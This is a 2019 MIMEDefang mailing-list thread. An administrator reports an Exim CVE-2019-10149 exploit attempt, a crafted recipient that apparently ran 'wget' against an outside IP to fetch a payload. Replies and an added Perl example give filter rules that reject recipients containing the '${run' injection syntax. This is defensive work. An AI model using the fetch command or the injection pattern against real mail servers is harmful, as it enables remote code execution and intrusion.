Re: [Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Dianne Skoll
On 6/25/19 4:50 PM, Kevin A. McGrail wrote:

> It's an exim exploit CVE-2019-10149.  MIMEDefang won't be affected but
> you are correct what it is trying to do.

> In filter_recipient, add this to reject this exploit attempt:

>   #EXIM EXPLOIT 2019 June
>   if ($recip =~ /root\+\$\{run/i) {
>     $explanation = "Invalid user";
>     $answer = 'REJECT';
>
>     return ($answer, $explanation);
>   }

Thanks for the info; I was racking my brains figuring out how
MIMEDefang could have been tricked by that.

Unless you have odd email addresses, I'd simply reject any address
that contains "${".  Then you will catch variants such as
postmaster+${ etc.

Regards,

Dianne.
___
NOTE: If there is a disclaimer or other legal boilerplate in the above
message, it is NULL AND VOID.  You may ignore it.

Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list MIMEDefang@lists.roaringpenguin.com
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang


Re: [Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Kevin A. McGrail
On 6/25/2019 4:25 PM, Stefan Schoeman wrote:
> Hoping someone can assist me with this...
>
> I just came across an email processed by MIMEDefang that seems to have
> had a specially crafted recipient. It seems as if the crafted
> recipient managed to coerce either my mimedefang-filter, or MIMEDefang
> itself to actually execute script. The recipient was recorded as : 

It's an exim exploit CVE-2019-10149.  MIMEDefang won't be affected but
you are correct what it is trying to do.

In filter_recipient, add this to reject this exploit attempt:

  #EXIM EXPLOIT 2019 June
  if ($recip =~ /root\+\$\{run/i) {
    $explanation = "Invalid user";
    $answer = 'REJECT';

    return ($answer, $explanation);
  }

Regards,

KAM

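An added example (not code from the thread or from the MIMEDefang project) that puts Dianne's broader rule, rejecting any recipient containing the literal "${", into a filter_recipient with the argument list documented in mimedefang-filter(5). It also covers the narrower root+${run case in Kevin's snippet above. The sample recipients and the harness loop are constructed so the file runs stand-alone with plain perl, outside MIMEDefang.

```perl
#!/usr/bin/perl
# Added example, not code from the thread: a filter_recipient that applies
# Dianne's broader rule (reject any recipient containing the literal "${"),
# which also covers the "root+${run" pattern in Kevin's snippet. The argument
# list follows mimedefang-filter(5); everything below the sub is a constructed
# harness so this file runs stand-alone with plain perl, outside MIMEDefang.
use strict;
use warnings;

# MIMEDefang calls this once per RCPT TO and expects a list back:
# ('CONTINUE', 'ok') to accept, or ('REJECT', 'reason') to refuse.
# $recipient arrives with angle brackets, e.g. '<user@example.com>'.
sub filter_recipient {
    my ($recipient, $sender, $ip, $hostname, $first, $helo,
        $rcpt_mailer, $rcpt_host, $rcpt_addr) = @_;

    # A literal "${" never appears in a legitimate address, so a plain
    # substring search is enough; index() with a single-quoted pattern
    # avoids any regex or interpolation surprises with the "$" and "{".
    if (index($recipient, '${') != -1) {
        # Keep the SMTP reason generic, as in the thread's snippet.
        return ('REJECT', 'Invalid user');
    }

    return ('CONTINUE', 'ok');
}

# Constructed sample recipients: two shaped like the probe in the thread,
# two legitimate ones (plus-addressing is fine and must still pass).
my @samples = (
    '<root+${run{...}}@example.invalid>',
    '<postmaster+${run{...}}@example.invalid>',
    '<user@example.invalid>',
    '<user+tag@example.invalid>',
);

for my $r (@samples) {
    my ($answer, $explanation) = filter_recipient(
        $r, '<>', '192.0.2.1', 'mail.example.invalid', 1,
        'helo.example.invalid', 'local', 'localhost', $r,
    );
    printf "%-42s => %s (%s)\n", $r, $answer, $explanation;
}
```

To use it for real, copy only the sub into mimedefang-filter (replacing any existing filter_recipient) and drop the harness. Note that MIMEDefang only invokes filter_recipient when the mimedefang daemon is started with the -r option; without it the check never runs, which is worth confirming before relying on it.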


[Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Stefan Schoeman

Hoping someone can assist me with this...

I just came across an email processed by MIMEDefang that seems to have 
had a specially crafted recipient. It seems as if the crafted recipient 
managed to coerce either my mimedefang-filter, or MIMEDefang itself to 
actually execute script. The recipient was recorded as :




which looks as if it tried to execute /bin/sh -c "wget 
65.181.120.163/stfinracu", with at least some partial success, because 
the .INPUTMSG file  resulted in:


Received: 1
Received: 2
Received: 3
...
...
Received: 31

A SpamAssassin scan of this file, then yielded:

1.2 MISSING_HEADERS    Missing To: header
1.8 MISSING_SUBJECT    Missing Subject: header
2.3 EMPTY_MESSAGE  Message appears to have no textual parts and no Subject: text

1.0 MISSING_FROM   Missing From: header
0.0 MSGID_FROM_MTA_HEADER  Message-Id was added by a relay
1.4 MISSING_DATE   Missing Date: header

which seems to indicate that this lot happened before SpamAssassin ran 
in filter_end.


My logfile indicated the following:

Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=, size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747@--->, proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG REPLYTO=, SENDER=, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject : 
x5PJLcKV004747 :  : 2 : 7.715 : 0.85136 :  : 
 
: 34.228.4.69 : 395

Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding because filter instructed us to
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded

I would very much like to hear the community's opinion on this and how I 
can protect against it.


Thanks in advance!
Stefan

